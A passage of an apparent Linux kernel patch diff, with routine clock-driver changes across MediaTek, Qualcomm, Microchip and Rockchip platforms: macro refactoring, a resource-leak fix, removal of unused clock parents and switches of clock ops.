+diff --git a/drivers/clk/mediatek/clk-mt8167-mm.c b/drivers/clk/mediatek/clk-mt8167-mm.c
+index 73910060577f6..a94961b7b8cc6 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mm.c
++++ b/drivers/clk/mediatek/clk-mt8167-mm.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8167-vdec.c b/drivers/clk/mediatek/clk-mt8167-vdec.c
+index ee4fffb6859da..38f0ba357d599 100644
+--- a/drivers/clk/mediatek/clk-mt8167-vdec.c
++++ b/drivers/clk/mediatek/clk-mt8167-vdec.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] __initconst = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt8173-mm.c b/drivers/clk/mediatek/clk-mt8173-mm.c
+index 8abf42c2030c6..5826eabdc9c77 100644
+--- a/drivers/clk/mediatek/clk-mt8173-mm.c
++++ b/drivers/clk/mediatek/clk-mt8173-mm.c
+@@ -25,23 +25,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mt8173_mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8516-aud.c b/drivers/clk/mediatek/clk-mt8516-aud.c
+index 90f48068a8de7..a3dafc719799c 100644
+--- a/drivers/clk/mediatek/clk-mt8516-aud.c
++++ b/drivers/clk/mediatek/clk-mt8516-aud.c
+@@ -22,14 +22,8 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8516.c b/drivers/clk/mediatek/clk-mt8516.c
+index b96db88893e23..056953d594c66 100644
+--- a/drivers/clk/mediatek/clk-mt8516.c
++++ b/drivers/clk/mediatek/clk-mt8516.c
+@@ -525,59 +525,23 @@ static const struct mtk_gate_regs top5_cg_regs = {
+ 	.sta_ofs = 0x44,
+ };
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP2_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP4_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP4_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top4_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top5_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate top_clks[] __initconst = {
+ 	/* TOP1 */
+diff --git a/drivers/clk/mediatek/clk-pllfh.c b/drivers/clk/mediatek/clk-pllfh.c
+index f48780bec5077..f135b32c6dbed 100644
+--- a/drivers/clk/mediatek/clk-pllfh.c
++++ b/drivers/clk/mediatek/clk-pllfh.c
+@@ -75,13 +75,13 @@ void fhctl_parse_dt(const u8 *compatible_node, struct mtk_pllfh_data *pllfhs,
+ 	base = of_iomap(node, 0);
+ 	if (!base) {
+ 		pr_err("%s(): ioremap failed\n", __func__);
+-		return;
++		goto out_node_put;
+ 	}
+ 
+ 	num_clocks = of_clk_get_parent_count(node);
+ 	if (!num_clocks) {
+ 		pr_err("%s(): failed to get clocks property\n", __func__);
+-		return;
++		goto err;
+ 	}
+ 
+ 	for (i = 0; i < num_clocks; i++) {
+@@ -102,6 +102,13 @@ void fhctl_parse_dt(const u8 *compatible_node, struct mtk_pllfh_data *pllfhs,
+ 		pllfh->state.ssc_rate = ssc_rate;
+ 		pllfh->state.base = base;
+ 	}
++
++out_node_put:
++	of_node_put(node);
++	return;
++err:
++	iounmap(base);
++	goto out_node_put;
+ }
+ 
+ static void pllfh_init(struct mtk_fh *fh, struct mtk_pllfh_data *pllfh_data)
+diff --git a/drivers/clk/microchip/clk-mpfs.c b/drivers/clk/microchip/clk-mpfs.c
+index 4f0a19db7ed74..cc5d7dee59f06 100644
+--- a/drivers/clk/microchip/clk-mpfs.c
++++ b/drivers/clk/microchip/clk-mpfs.c
+@@ -374,14 +374,13 @@ static void mpfs_reset_unregister_adev(void *_adev)
+ 	struct auxiliary_device *adev = _adev;
+ 
+ 	auxiliary_device_delete(adev);
++	auxiliary_device_uninit(adev);
+ }
+ 
+ static void mpfs_reset_adev_release(struct device *dev)
+ {
+ 	struct auxiliary_device *adev = to_auxiliary_dev(dev);
+ 
+-	auxiliary_device_uninit(adev);
+-
+ 	kfree(adev);
+ }
+ 
+diff --git a/drivers/clk/qcom/dispcc-qcm2290.c b/drivers/clk/qcom/dispcc-qcm2290.c
+index 96b149365912a..24755dc841f9d 100644
+--- a/drivers/clk/qcom/dispcc-qcm2290.c
++++ b/drivers/clk/qcom/dispcc-qcm2290.c
+@@ -26,7 +26,6 @@ enum {
+ 	P_DISP_CC_PLL0_OUT_MAIN,
+ 	P_DSI0_PHY_PLL_OUT_BYTECLK,
+ 	P_DSI0_PHY_PLL_OUT_DSICLK,
+-	P_DSI1_PHY_PLL_OUT_DSICLK,
+ 	P_GPLL0_OUT_MAIN,
+ 	P_SLEEP_CLK,
+ };
+@@ -71,7 +70,6 @@ static const struct parent_map disp_cc_parent_map_0[] = {
+ static const struct clk_parent_data disp_cc_parent_data_0[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_byteclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_1[] = {
+@@ -80,7 +78,6 @@ static const struct parent_map disp_cc_parent_map_1[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_1[] = {
+ 	{ .fw_name = "bi_tcxo" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_2[] = {
+@@ -91,7 +88,6 @@ static const struct parent_map disp_cc_parent_map_2[] = {
+ static const struct clk_parent_data disp_cc_parent_data_2[] = {
+ 	{ .fw_name = "bi_tcxo_ao" },
+ 	{ .fw_name = "gcc_disp_gpll0_div_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_3[] = {
+@@ -104,20 +100,16 @@ static const struct clk_parent_data disp_cc_parent_data_3[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .hw = &disp_cc_pll0.clkr.hw },
+ 	{ .fw_name = "gcc_disp_gpll0_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_4[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_DSI0_PHY_PLL_OUT_DSICLK, 1 },
+-	{ P_DSI1_PHY_PLL_OUT_DSICLK, 2 },
+ };
+ 
+ static const struct clk_parent_data disp_cc_parent_data_4[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_dsiclk" },
+-	{ .fw_name = "dsi1_phy_pll_out_dsiclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_5[] = {
+@@ -126,7 +118,6 @@ static const struct parent_map disp_cc_parent_map_5[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_5[] = {
+ 	{ .fw_name = "sleep_clk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static struct clk_rcg2 disp_cc_mdss_byte0_clk_src = {
+diff --git a/drivers/clk/qcom/gcc-qcm2290.c b/drivers/clk/qcom/gcc-qcm2290.c
+index 7792b8f237047..096deff2ba257 100644
+--- a/drivers/clk/qcom/gcc-qcm2290.c
++++ b/drivers/clk/qcom/gcc-qcm2290.c
+@@ -1243,7 +1243,8 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parents_12,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_12),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-sm6115.c b/drivers/clk/qcom/gcc-sm6115.c
+index 565f9912039fe..631419caf695a 100644
+--- a/drivers/clk/qcom/gcc-sm6115.c
++++ b/drivers/clk/qcom/gcc-sm6115.c
+@@ -694,7 +694,7 @@ static struct clk_rcg2 gcc_camss_axi_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -715,7 +715,7 @@ static struct clk_rcg2 gcc_camss_cci_clk_src = {
+ 		.parent_data = gcc_parents_9,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_9),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -738,7 +738,7 @@ static struct clk_rcg2 gcc_camss_csi0phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -753,7 +753,7 @@ static struct clk_rcg2 gcc_camss_csi1phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -768,7 +768,7 @@ static struct clk_rcg2 gcc_camss_csi2phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -790,7 +790,7 @@ static struct clk_rcg2 gcc_camss_mclk0_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -805,7 +805,7 @@ static struct clk_rcg2 gcc_camss_mclk1_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -820,7 +820,7 @@ static struct clk_rcg2 gcc_camss_mclk2_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -835,7 +835,7 @@ static struct clk_rcg2 gcc_camss_mclk3_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -857,7 +857,7 @@ static struct clk_rcg2 gcc_camss_ope_ahb_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -881,7 +881,7 @@ static struct clk_rcg2 gcc_camss_ope_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -916,7 +916,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -941,7 +941,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -956,7 +956,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -971,7 +971,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -986,7 +986,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1001,7 +1001,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1024,7 +1024,7 @@ static struct clk_rcg2 gcc_camss_tfe_cphy_rx_clk_src = {
+ 		.parent_data = gcc_parents_10,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_10),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1046,7 +1046,7 @@ static struct clk_rcg2 gcc_camss_top_ahb_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1116,7 +1116,7 @@ static struct clk_rcg2 gcc_pdm2_clk_src = {
+ 		.name = "gcc_pdm2_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1329,7 +1329,7 @@ static struct clk_rcg2 gcc_ufs_phy_axi_clk_src = {
+ 		.name = "gcc_ufs_phy_axi_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1351,7 +1351,7 @@ static struct clk_rcg2 gcc_ufs_phy_ice_core_clk_src = {
+ 		.name = "gcc_ufs_phy_ice_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1392,7 +1392,7 @@ static struct clk_rcg2 gcc_ufs_phy_unipro_core_clk_src = {
+ 		.name = "gcc_ufs_phy_unipro_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1414,7 +1414,7 @@ static struct clk_rcg2 gcc_usb30_prim_master_clk_src = {
+ 		.name = "gcc_usb30_prim_master_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1483,7 +1483,7 @@ static struct clk_rcg2 gcc_video_venus_clk_src = {
+ 		.parent_data = gcc_parents_13,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_13),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/gcc-sm8350.c b/drivers/clk/qcom/gcc-sm8350.c
+index c3731f96c8e6b..430ef407a8341 100644
+--- a/drivers/clk/qcom/gcc-sm8350.c
++++ b/drivers/clk/qcom/gcc-sm8350.c
+@@ -17,6 +17,7 @@
+ #include "clk-regmap.h"
+ #include "clk-regmap-divider.h"
+ #include "clk-regmap-mux.h"
++#include "clk-regmap-phy-mux.h"
+ #include "gdsc.h"
+ #include "reset.h"
+ 
+@@ -167,26 +168,6 @@ static const struct clk_parent_data gcc_parent_data_3[] = {
+ 	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+-static const struct parent_map gcc_parent_map_4[] = {
+-	{ P_PCIE_0_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_4[] = {
+-	{ .fw_name = "pcie_0_pipe_clk", },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+-static const struct parent_map gcc_parent_map_5[] = {
+-	{ P_PCIE_1_PIPE_CLK, 0 },
+-	{ P_BI_TCXO, 2 },
+-};
+-
+-static const struct clk_parent_data gcc_parent_data_5[] = {
+-	{ .fw_name = "pcie_1_pipe_clk" },
+-	{ .fw_name = "bi_tcxo" },
+-};
+-
+ static const struct parent_map gcc_parent_map_6[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_GCC_GPLL0_OUT_MAIN, 1 },
+@@ -289,32 +270,30 @@ static const struct clk_parent_data gcc_parent_data_14[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_0_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_0_pipe_clk_src = {
+ 	.reg = 0x6b054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_4,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_0_pipe_clk_src",
+-			.parent_data = gcc_parent_data_4,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_4),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_0_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
+ 
+-static struct clk_regmap_mux gcc_pcie_1_pipe_clk_src = {
++static struct clk_regmap_phy_mux gcc_pcie_1_pipe_clk_src = {
+ 	.reg = 0x8d054,
+-	.shift = 0,
+-	.width = 2,
+-	.parent_map = gcc_parent_map_5,
+ 	.clkr = {
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gcc_pcie_1_pipe_clk_src",
+-			.parent_data = gcc_parent_data_5,
+-			.num_parents = ARRAY_SIZE(gcc_parent_data_5),
+-			.ops = &clk_regmap_mux_closest_ops,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "pcie_1_pipe_clk",
++			},
++			.num_parents = 1,
++			.ops = &clk_regmap_phy_mux_ops,
+ 		},
+ 	},
+ };
+diff --git a/drivers/clk/qcom/lpassaudiocc-sc7280.c b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+index 1339f9211a149..134eb1529ede2 100644
+--- a/drivers/clk/qcom/lpassaudiocc-sc7280.c
++++ b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+@@ -696,6 +696,8 @@ static const struct qcom_cc_desc lpass_cc_sc7280_desc = {
+ 	.config = &lpass_audio_cc_sc7280_regmap_config,
+ 	.clks = lpass_cc_sc7280_clocks,
+ 	.num_clks = ARRAY_SIZE(lpass_cc_sc7280_clocks),
++	.gdscs = lpass_aon_cc_sc7280_gdscs,
++	.num_gdscs = ARRAY_SIZE(lpass_aon_cc_sc7280_gdscs),
+ };
+ 
+ static const struct qcom_cc_desc lpass_audio_cc_sc7280_desc = {
+diff --git a/drivers/clk/qcom/lpasscc-sc7280.c b/drivers/clk/qcom/lpasscc-sc7280.c
+index 5c1e17bd0d763..8486d7135ab10 100644
+--- a/drivers/clk/qcom/lpasscc-sc7280.c
++++ b/drivers/clk/qcom/lpasscc-sc7280.c
+@@ -118,14 +118,18 @@ static int lpass_cc_sc7280_probe(struct platform_device *pdev)
+ 		goto destroy_pm_clk;
+ 	}
+ 
+-	lpass_regmap_config.name = "qdsp6ss";
+-	desc = &lpass_qdsp6ss_sc7280_desc;
+-
+-	ret = qcom_cc_probe_by_index(pdev, 0, desc);
+-	if (ret)
+-		goto destroy_pm_clk;
++	if (!of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
++		lpass_regmap_config.name = "qdsp6ss";
++		lpass_regmap_config.max_register = 0x3f;
++		desc = &lpass_qdsp6ss_sc7280_desc;
++
++		ret = qcom_cc_probe_by_index(pdev, 0, desc);
++		if (ret)
++			goto destroy_pm_clk;
++	}
+ 
+ 	lpass_regmap_config.name = "top_cc";
++	lpass_regmap_config.max_register = 0x4;
+ 	desc = &lpass_cc_top_sc7280_desc;
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+diff --git a/drivers/clk/rockchip/clk-rk3399.c b/drivers/clk/rockchip/clk-rk3399.c
+index 306910a3a0d38..9ebd6c451b3db 100644
+--- a/drivers/clk/rockchip/clk-rk3399.c
++++ b/drivers/clk/rockchip/clk-rk3399.c
+@@ -1263,7 +1263,7 @@ static struct rockchip_clk_branch rk3399_clk_branches[] __initdata = {
+ 			RK3399_CLKSEL_CON(56), 6, 2, MFLAGS,
+ 			RK3399_CLKGATE_CON(10), 7, GFLAGS),
+ 
+-	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, 0,
++	COMPOSITE_NOGATE(SCLK_CIF_OUT, "clk_cifout", mux_clk_cif_p, CLK_SET_RATE_PARENT,
+ 			 RK3399_CLKSEL_CON(56), 5, 1, MFLAGS, 0, 5, DFLAGS),
+ 
+ 	/* gic */
+diff --git a/drivers/clocksource/timer-davinci.c b/drivers/clocksource/timer-davinci.c
+index 9996c05425200..b1c248498be46 100644
+--- a/drivers/clocksource/timer-davinci.c
++++ b/drivers/clocksource/timer-davinci.c
